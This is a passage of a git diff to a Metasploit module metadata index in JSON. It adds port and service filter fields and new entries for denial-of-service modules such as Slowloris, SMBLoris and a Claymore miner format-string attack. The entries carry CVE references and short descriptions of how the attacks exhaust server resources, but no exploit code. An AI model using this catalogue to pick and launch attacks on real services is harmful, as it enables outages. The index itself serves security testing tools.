3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb", @@ -4999,6 +6891,12 @@ "platform": "", "arch": "", "rport": 5900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb", @@ -5030,6 +6928,12 @@ "platform": "", "arch": "", "rport": 17185, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb", @@ -5061,6 +6965,12 @@ "platform": "", "arch": "", "rport": 17185, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb", @@ -5092,6 +7002,12 @@ "platform": "", "arch": "", "rport": 17185, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb", @@ -5123,6 +7039,12 @@ "platform": "", "arch": "", "rport": 17185, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb", @@ -5157,6 +7079,21 @@ "platform": "", "arch": "", "rport": 10000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb", @@ -5190,6 +7127,21 @@ "platform": "", "arch": "", "rport": 10000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/webmin/file_disclosure.rb", @@ -5222,6 +7174,12 @@ "platform": "", "arch": "", "rport": 10001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/zend/java_bridge.rb", @@ -5252,6 +7210,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_aix.rb", @@ -5281,6 +7245,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_crack_fast.rb", @@ -5311,6 +7281,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_linux.rb", @@ -5341,6 +7317,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_mssql_fast.rb", @@ -5371,6 +7353,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_mysql_fast.rb", @@ -5401,6 +7389,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_oracle_fast.rb", @@ -5430,6 +7424,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_postgres_fast.rb", @@ -5461,6 +7461,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/bnat/bnat_router.rb", @@ -5492,6 +7498,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/bnat/bnat_scan.rb", @@ -5521,6 +7533,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-09-11 18:30:34 +0000", "path": "/modules/auxiliary/client/hwbridge/connect.rb", @@ -5550,6 +7577,12 @@ "platform": "", "arch": "", "rport": 2404, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-03 20:13:48 +0000", "path": "/modules/auxiliary/client/iec104/iec104.rb", @@ -5579,6 +7612,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/client/mms/send_mms.rb", @@ -5608,6 +7647,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/client/sms/send_text.rb", @@ -5637,6 +7682,18 @@ "platform": "", "arch": "", "rport": "25", + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/client/smtp/emailer.rb", @@ -5666,6 +7723,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/crawler/msfcrawler.rb", @@ -5695,6 +7758,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/docx/word_unc_injector.rb", @@ -5726,6 +7795,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/android/android_stock_browser_iframe.rb", @@ -5757,8 +7832,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, - "mod_time": "2018-09-16 19:51:15 +0000", + "mod_time": "2018-09-24 17:10:13 +0000", "path": "/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb", "is_install_path": true, "ref_name": "dos/apple_ios/webkit_backdrop_filter_blur", @@ -5788,6 +7869,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb", @@ -5820,6 +7907,12 @@ "platform": "", "arch": "", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/cisco/ios_telnet_rocem.rb", @@ -5852,6 +7945,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb", @@ -5885,6 +7984,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/dns/bind_tkey.rb", @@ -5918,6 +8023,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 10:41:10 +0000", "path": "/modules/auxiliary/dos/dns/bind_tsig.rb", @@ -5949,6 +8060,12 @@ "platform": "", "arch": "", "rport": 2049, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb", @@ -5981,6 +8098,12 @@ "platform": "", "arch": "", "rport": 1530, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/hp/data_protector_rds.rb", @@ -6012,6 +8135,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/http/3com_superstack_switch.rb", @@ -6044,6 +8173,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb", @@ -6080,6 +8224,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/apache_mod_isapi.rb", @@ -6114,6 +8264,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/apache_range_dos.rb", @@ -6147,6 +8312,12 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb", @@ -6178,6 +8349,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-01-24 20:54:21 +0000", "path": "/modules/auxiliary/dos/http/brother_debut_dos.rb", @@ -6208,6 +8394,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/canon_wireless_printer.rb", @@ -6240,6 +8441,12 @@ "platform": "", "arch": "", "rport": 1311, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/http/dell_openmanage_post.rb", @@ -6271,6 +8478,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb", @@ -6301,6 +8523,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-05-29 16:09:27 +0000", "path": "/modules/auxiliary/dos/http/flexense_http_server_dos.rb", @@ -6331,6 +8559,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/gzip_bomb_dos.rb", @@ -6373,6 +8607,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/hashcollision_dos.rb", @@ -6404,6 +8653,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-09 17:02:24 +0000", "path": "/modules/auxiliary/dos/http/ibm_lotus_notes.rb", @@ -6434,6 +8689,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-06 20:45:50 +0000", "path": "/modules/auxiliary/dos/http/ibm_lotus_notes2.rb", @@ -6465,6 +8726,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-16 14:59:32 +0000", "path": "/modules/auxiliary/dos/http/marked_redos.rb", @@ -6496,6 +8772,12 @@ "platform": "", "arch": "", "rport": 2001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/monkey_headers.rb", @@ -6531,6 +8813,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb", @@ -6565,6 +8862,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/nodejs_pipelining.rb", @@ -6595,6 +8898,21 @@ "platform": "", "arch": "", "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb", @@ -6630,6 +8948,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/dos/http/rails_action_view.rb", @@ -6663,6 +8987,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/rails_json_float_dos.rb", @@ -6674,6 +9013,47 @@ "notes": { } }, + "auxiliary_dos/http/slowloris": { + "name": "Slowloris Denial of Service Attack", + "full_name": "auxiliary/dos/http/slowloris", + "rank": 300, + "disclosure_date": "2009-06-17", + "type": "auxiliary", + "author": [ + "RSnake", + "Gokberk Yaltirakli", + "Daniel Teixeira", + "Matthew Kienow " + ], + "description": "Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.\n It accomplishes this by opening connections to the target web server and sending a partial request.\n Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request.\n Affected servers will keep these connections open, filling their maximum concurrent connection pool,\n eventually denying additional connection attempts from clients.", + "references": [ + "CVE-2007-6750", + "CVE-2010-2227", + "EDB-8976", + "URL-https://github.com/gkbrk/slowloris" + ], + "is_server": false, + "is_client": false, + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": null, + "mod_time": "2018-08-28 13:49:31 +0000", + "path": "/modules/auxiliary/dos/http/slowloris.py", + "is_install_path": true, + "ref_name": "dos/http/slowloris", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "auxiliary_dos/http/sonicwall_ssl_format": { "name": "SonicWALL SSL-VPN Format String Vulnerability", "full_name": "auxiliary/dos/http/sonicwall_ssl_format", @@ -6694,6 +9074,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/http/sonicwall_ssl_format.rb", @@ -6726,6 +9121,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/dos/http/ua_parser_js_redos.rb", @@ -6761,6 +9171,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-14 11:25:00 +0000", "path": "/modules/auxiliary/dos/http/webkitplus.rb", @@ -6793,6 +9209,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/webrick_regex.rb", @@ -6825,6 +9256,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb", @@ -6845,7 +9291,7 @@ "author": [ "Javier Nieto Arevalo", "Andres Rojas Guerrero", - "Rob Carr " + "rastating" ], "description": "WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x\n before 4.0.1 allows remote attackers to cause a denial of service\n (CPU consumption) via a long password that is improperly handled\n during hashing.", "references": [ @@ -6859,8 +9305,23 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, - "mod_time": "2018-07-12 17:34:52 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/auxiliary/dos/http/wordpress_long_password_dos.rb", "is_install_path": true, "ref_name": "dos/http/wordpress_long_password_dos", @@ -6894,6 +9355,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb", @@ -6925,6 +9401,12 @@ "platform": "", "arch": "", "rport": 3000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-12-11 11:49:31 +0000", "path": "/modules/auxiliary/dos/http/ws_dos.rb", @@ -6955,6 +9437,12 @@ "platform": "", "arch": "", "rport": 5353, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/mdns/avahi_portzero.rb", @@ -6986,6 +9474,12 @@ "platform": "", "arch": "", "rport": 7902, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/dos/misc/dopewars.rb", @@ -7020,6 +9514,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb", @@ -7051,6 +9551,12 @@ "platform": "", "arch": "", "rport": 11460, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/misc/ibm_tsm_dos.rb", @@ -7082,6 +9588,12 @@ "platform": "", "arch": "", "rport": 11211, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/misc/memcached.rb", @@ -7114,6 +9626,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb", @@ -7146,6 +9664,12 @@ "platform": "", "arch": "", "rport": 1723, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb", @@ -7178,6 +9702,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/rpc/rpcbomb.rb", @@ -7208,6 +9738,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb", @@ -7238,6 +9776,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/samba/lsa_transnames_heap.rb", @@ -7271,6 +9817,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb", @@ -7303,6 +9857,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb", @@ -7335,6 +9904,12 @@ "platform": "", "arch": "", "rport": 48899, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/scada/beckhoff_twincat.rb", @@ -7365,6 +9940,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/scada/d20_tftp_overflow.rb", @@ -7396,6 +9977,12 @@ "platform": "", "arch": "", "rport": 12401, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/scada/igss9_dataserver.rb", @@ -7426,6 +10013,12 @@ "platform": "", "arch": "", "rport": 50000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-28 13:12:43 +0000", "path": "/modules/auxiliary/dos/scada/siemens_siprotec4.rb", @@ -7458,6 +10051,12 @@ "platform": "", "arch": "", "rport": 52302, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb", @@ -7469,6 +10068,42 @@ "notes": { } }, + "auxiliary_dos/smb/smb_loris": { + "name": "SMBLoris NBSS Denial of Service", + "full_name": "auxiliary/dos/smb/smb_loris", + "rank": 300, + "disclosure_date": "2017-06-29", + "type": "auxiliary", + "author": [ + "thelightcosine", + "Adam Cammack " + ], + "description": "The SMBLoris attack consumes large chunks of memory in the target by sending\n SMB requests with the NetBios Session Service(NBSS) Length Header value set\n to the maximum possible value. By keeping these connections open and initiating\n large numbers of these sessions, the memory does not get freed, and the server\n grinds to a halt. This vulnerability was originally disclosed by Sean Dillon\n and Zach Harding.\n\n DISCALIMER: This module opens a lot of simultaneous connections. Please check\n your system's ULIMIT to make sure it can handle it. This module will also run\n continuously until stopped.", + "references": [ + "URL-http://smbloris.com/" + ], + "is_server": false, + "is_client": false, + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": null, + "mod_time": "2018-03-23 14:55:18 +0000", + "path": "/modules/auxiliary/dos/smb/smb_loris.rb", + "is_install_path": true, + "ref_name": "dos/smb/smb_loris", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "auxiliary_dos/smtp/sendmail_prescan": { "name": "Sendmail SMTP Address prescan Memory Corruption", "full_name": "auxiliary/dos/smtp/sendmail_prescan", @@ -7490,6 +10125,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/smtp/sendmail_prescan.rb", @@ -7522,6 +10169,12 @@ "platform": "", "arch": "", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb", @@ -7553,6 +10206,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb", @@ -7587,6 +10246,12 @@ "platform": "", "arch": "", "rport": 4433, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb", @@ -7617,6 +10282,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/ssl/openssl_aesni.rb", @@ -7648,6 +10319,12 @@ "platform": "", "arch": "", "rport": 514, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb", @@ -7659,6 +10336,44 @@ "notes": { } }, + "auxiliary_dos/tcp/claymore_dos": { + "name": "Claymore Dual GPU Miner Format String dos attack", + "full_name": "auxiliary/dos/tcp/claymore_dos", + "rank": 300, + "disclosure_date": "2018-02-06", + "type": "auxiliary", + "author": [ + "res1n", + "bluebird" + ], + "description": "Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.", + "references": [ + "CVE-2018-6317", + "EDB-43972", + "URL-https://github.com/nanopool/Claymore-Dual-Miner" + ], + "is_server": false, + "is_client": false, + "platform": "", + "arch": "", + "rport": 3333, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": null, + "mod_time": "2018-08-29 06:09:40 +0000", + "path": "/modules/auxiliary/dos/tcp/claymore_dos.py", + "is_install_path": true, + "ref_name": "dos/tcp/claymore_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "auxiliary_dos/tcp/junos_tcp_opt": { "name": "Juniper JunOS Malformed TCP Option", "full_name": "auxiliary/dos/tcp/junos_tcp_opt", @@ -7679,6 +10394,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/tcp/junos_tcp_opt.rb", @@ -7708,6 +10429,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/tcp/synflood.rb", @@ -7741,6 +10468,12 @@ "platform": "", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/upnp/miniupnpd_dos.rb", @@ -7772,6 +10505,12 @@ "platform": "", "arch": "", "rport": 5400, + 